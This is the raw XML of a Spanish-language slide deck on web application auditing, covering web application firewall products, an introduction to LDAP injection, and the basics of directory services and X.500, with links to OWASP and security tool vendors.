        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="6858000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chemeClr val="accent2">
                  <a:lumMod val="20000"/>
                  <a:lumOff val="80000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="8300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s-ES">
              <a:cs typeface="+mn-cs"/>
            </a:endParaRP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61125" y="1362612"/>
            <a:ext cx="6443663" cy="3113088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>
            <a:lvl1pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:defRPr sz="5000" b="1" u="none" cap="none" spc="0" baseline="0">
                <a:ln w="1905"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Tx/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p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53146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9826" y="4561939"/>
            <a:ext cx="6451600" cy="673100"/>
          </a:xfrm>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="threePt" dir="t"/>
          </a:scene3d>
          <a:sp3d>
            <a:bevelT w="50800" h="50800"/>
          </a:sp3d>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720">
            <a:sp3d extrusionH="57150">
              <a:bevelT w="50800" h="50800"/>
            </a:sp3d>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"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17/02/2017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ED3B2D-6A75-4DB1-9318-321C10ACEF87}" type="datetimeFigureOut">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:pPr/>
              <a:t>17/02/2017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DB52AC-5556-48A6-A07F-DF2B5775112D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20232477">
            <a:off x="6221" y="5138496"/>
            <a:ext cx="1875153" cy="394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99752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80000"/>
              <a:buFont typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              <a:buChar char="►"/>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:buClr>
                <a:schemeClr val="accent2">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:buClr>
                <a:schemeClr val="accent2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:buClr>
                <a:schemeClr val="accent2">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:buClr>
                <a:schemeClr val="accent2">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buSzPct val="8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j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\Microsoft Office\MEDIA\CAGCAT10\j03028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1395413"/>
            <a:ext cx="2060575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99752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02578" y="1488250"/>
            <a:ext cx="6020788" cy="4665663"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              <a:buChar char="►"/>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:buClr>
                <a:schemeClr val="accent2">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:buClr>
                <a:schemeClr val="accent2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:buClr>
                <a:schemeClr val="accent2">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:buClr>
                <a:schemeClr val="accent2">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buSzPct val="8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atiasCordero\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\58YHQ15H\MPj040182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013" y="1466850"/>
            <a:ext cx="2573337" cy="171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0089" y="1935678"/>
            <a:ext cx="5913911" cy="270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HeroicExtremeRightFacing"/>
            <a:lightRig rig="threePt" dir="t"/>
          </a:scene3d>
          <a:sp3d>
            <a:bevelT/>
          </a:sp3d>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" anchor="ctr">
            <a:scene3d>
              <a:camera prst="perspectiveHeroicExtremeRightFacing"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
            <a:sp3d extrusionH="57150">
              <a:bevelT w="101600" h="101600"/>
              <a:bevelB w="101600" h="101600"/>
            </a:sp3d>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:defRPr sz="5000" b="1" u="none" cap="none" spc="0" baseline="0">
                <a:ln w="1905"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Tx/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"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s-ES" sz="12000" kern="0" dirty="0"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5" name="Picture 3" descr="C:\Users\MatiasCordero\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\58YHQ15H\MCj039850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050" y="3883025"/>
            <a:ext cx="1768475" cy="140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99752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atiasCordero\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VPUBOSU6\MPj0401828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384300"/>
            <a:ext cx="2081212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41319" y="1389413"/>
            <a:ext cx="6035365" cy="3111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lIns="0" anchor="ctr">
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
            <a:sp3d extrusionH="57150">
              <a:bevelT w="101600" h="101600"/>
            </a:sp3d>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:defRPr sz="5000" b="1" u="none" cap="none" spc="0" baseline="0">
                <a:ln w="1905"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Tx/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"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s-ES" sz="7200" kern="0" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>¿Preguntas?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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99752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s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MatiasCordero\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VPUBOSU6\MPj0401828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384300"/>
            <a:ext cx="2081212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541319" y="1389413"/>
            <a:ext cx="6035365" cy="3111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lIns="0" anchor="ctr">
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
            <a:sp3d extrusionH="57150">
              <a:bevelT w="101600" h="101600"/>
            </a:sp3d>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:defRPr sz="5000" b="1" u="none" cap="none" spc="0" baseline="0">
                <a:ln w="1905"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Tx/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"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s-ES" sz="7200" kern="0" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>¿Preguntas?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0" y="5163788"/>
            <a:ext cx="8823366" cy="997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r" eaLnBrk="0" hangingPunct="0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s-ES" sz="2800" u="sng" kern="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amartin@informatica64.com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11 Marcador de fecha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A7A565A-218B-4A18-8468-344999C6A273}" type="datetimeFigureOut">
              <a:rPr lang="es-ES"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>17/02/2017</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="20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D5B5BFD-F85C-439F-AB00-EB408FE5075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77788"/>
            <a:ext cx="7399338" cy="8413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01713" y="1487488"/>
            <a:ext cx="7027862" cy="4665662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dondear rectángulo de esquina del mismo lado"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="6858000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3000">
                <a:schemeClr val="accent2">
                  <a:lumMod val="20000"/>
                  <a:lumOff val="80000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="8300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s-ES">
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="11 Documento"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="1116281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h="165100"/>
          </a:sp3d>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="es-ES">
              <a:cs typeface="+mn-cs"/>
            </a:endParaRP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0263" y="0"/>
            <a:ext cx="7399337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lvl="0"/>
            <a:r>
              <a:rPr lang="es-ES" noProof="0" dirty="0"/>
              <a:t>Slide </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" noProof="0" dirty="0" err="1"/>
              <a:t>Title</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="205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1713" y="1487488"/>
            <a:ext cx="7027862" cy="46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Body Text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES"/>
              <a:t> Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="es-ES"/>
              <a:t> Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="es-ES"/>
              <a:t> Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="es-ES"/>
              <a:t> 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5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76" r:id="rId8"/>
    <p:sldLayoutId id="2147483777" r:id="rId9"/>
    <p:sldLayoutId id="2147483784" r:id="rId10"/>
    <p:sldLayoutId id="214748378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 u="sng">
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:uFill>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:u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 u="sng">
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:latin typeface="Calibri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 u="sng">
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:latin typeface="Calibri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 u="sng">
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:latin typeface="Calibri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 u="sng">
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:latin typeface="Calibri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33557C"/>
        </a:buClr>
        <a:buSzPct val="80000"/>
        <a:buFont typeface="Arial Narrow" pitchFamily="34" charset="0"/>
        <a:buChar char="►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31825" indent="-17462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33557C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2pPr>
      <a:lvl3pPr marL="860425" indent="-635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33557C"/>
        </a:buClr>
        <a:buSzPct val="70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3pPr>
      <a:lvl4pPr marL="1089025" indent="2825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33557C"/>
        </a:buClr>
        <a:buSzPct val="70000"/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4pPr>
      <a:lvl5pPr marL="13128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33557C"/>
        </a:buClr>
        <a:buSzPct val="70000"/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770063" indent="-158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227263" indent="-158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684463" indent="-158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141663" indent="-158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vacyware.com/intrusion_prevention.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.eeye.com/Products/SecureIIS-Web-Server-Security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odsecurity.org/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.applicure.com/" TargetMode="Externa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1487.txt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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject1.bin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ortify.com/ssa-elements/testing.html" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.gif"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://samate.nist.gov/index.php/Source_Code_Security_Analyzers.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/bb429476(VS.80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locwork.com/products/insight/klocwork-truepath/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.gif"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.gif"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.coverity.com/products/static-analysis.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.parasoft.com/jsp/solutions/application_security_solution.jsp?itemId=322" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www-142.ibm.com/software/products/es/es/appscansource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wasp.org/index.php/Top_10_2007-A1" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Top_10_2007-A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owasp.org/index.php/Top_10_2007-A4" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Top_10_2007-A3" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Top_10_2007-A2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wasp.org/index.php/Top_10_2007-A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owasp.org/index.php/Top_10_2007-A10" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Top_10_2007-A9" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Top_10_2007-A8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7.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package" Target="../embeddings/Microsoft_Word_Document.docx"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://greebo.net/owasp/httponly.php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ie/archive/2009/01/27/ie8-security-part-vii-clickjacking-defenses.asp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1.docx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downloads/details.aspx?FamilyId=EFB9C819-53FF-4F82-BFAF-E11625130C25&amp;displaylang=e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pixel-apes.com/safehtml/?page=safe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web.com/prog.asp?parametro1=hola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lex.com/marathontoo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8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kamai.com/html/solutions/security/waf.html" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.gif"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.binarysec.com/cm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61125" y="1362612"/>
            <a:ext cx="6443663" cy="18667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Auditoria </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1"/>
              <a:t>Aplicaciones</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t> Web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WAF (Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> Firewall)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21168" y="1487488"/>
            <a:ext cx="7027862" cy="4665662"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Funcionamiento como modulo del Servidor Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Se instala como un modulo en cada servidor Web y se configura para protegerse de ataques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Productos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>SecureIIS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>eEye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> Digital Security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> (IIS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>ThreatSentry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>privacyware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> (IIS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>dotDefender</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>AppliCure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> (IIS y Apache)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>modSecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>(Apache)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>…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Introducción</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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9088" y="1497013"/>
            <a:ext cx="714375" cy="9239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9725" y="2903538"/>
            <a:ext cx="742950" cy="1028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5325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6713" y="4406900"/>
            <a:ext cx="733425" cy="914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53254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0988" y="2943225"/>
            <a:ext cx="2284412" cy="935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 bwMode="auto">
          <a:xfrm>
            <a:off x="2706620" y="3191897"/>
            <a:ext cx="1367670" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/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GET/POST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19758865">
            <a:off x="4386414" y="2493516"/>
            <a:ext cx="2324183" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 56789"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst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SQL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2041783">
            <a:off x="4343427" y="3685826"/>
            <a:ext cx="2466339" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50553"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst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XPATH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4490977" y="3066505"/>
            <a:ext cx="2164465" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/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LDAP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53259" name="TextBox 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7604125" y="1377950"/>
            <a:ext cx="1096963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1600"/>
              <a:t>SQL Server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600"/>
              <a:t>MySQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600"/>
              <a:t>Oracle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53260" name="TextBox 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7421563" y="2838450"/>
            <a:ext cx="15652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1600"/>
              <a:t>Active Directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600"/>
              <a:t>One Directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600"/>
              <a:t>Novell eDirectory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Right Arrow 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4492902" y="3068430"/>
            <a:ext cx="2174115" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFB26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          LDAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-E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Injection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pic>
        <p:nvPicPr>
          <p:cNvPr id="53262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91000" y="2833688"/>
            <a:ext cx="844550" cy="10779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 directorio?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3926" y="1125214"/>
            <a:ext cx="8380412" cy="4819781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Palabra “poco” utilizada</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Una base de datos especializada en</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Consulta de datos frente a actualización de datos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Realizar búsquedas específicas frente a listar resultados</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Una base de datos que tolera inconsistencias temporales entre sus réplicas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Algo que utilizan casi todos los servicios y aplicaciones de red para almacenar la información de los usuarios.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree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 servicio de Directorio?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2587" y="1153206"/>
            <a:ext cx="8565470" cy="4930581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Un protocolo de red para acceder a los directorios</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Suele incluir un esquema o patrón de la estructura del directorio para que sea posible la replicación y distribución de datos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Pueden ser:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Locales: Proporcionan información de un contexto limitado y un único directorio</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Globales: Proporcionan información distribuida entre varios directorios. (Ejemplo Servicio DNS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/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Problemática de los directorios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4596" y="1162537"/>
            <a:ext cx="8668106" cy="6740307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Aunque no sabemos muy bien que son, son imprescindibles en nuestras infraestructuras</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Son necesarios casi para cualquier aplicación o servicio de red.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Su proliferación genera problemas:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Se multiplica el esfuerzo para generarlos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Se multiplica el esfuerzo para que gestionarlos </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Se almacenan información duplicada</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Se producen inconsistencias</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Pobre experiencia de usuario</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Problemas de seguridad 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>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree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Estándares de directorio  X.500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conjunto de estándares sobre servicios de directorio</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Optimizado para operaciones de Lectura</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Estructura Jerárquica</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
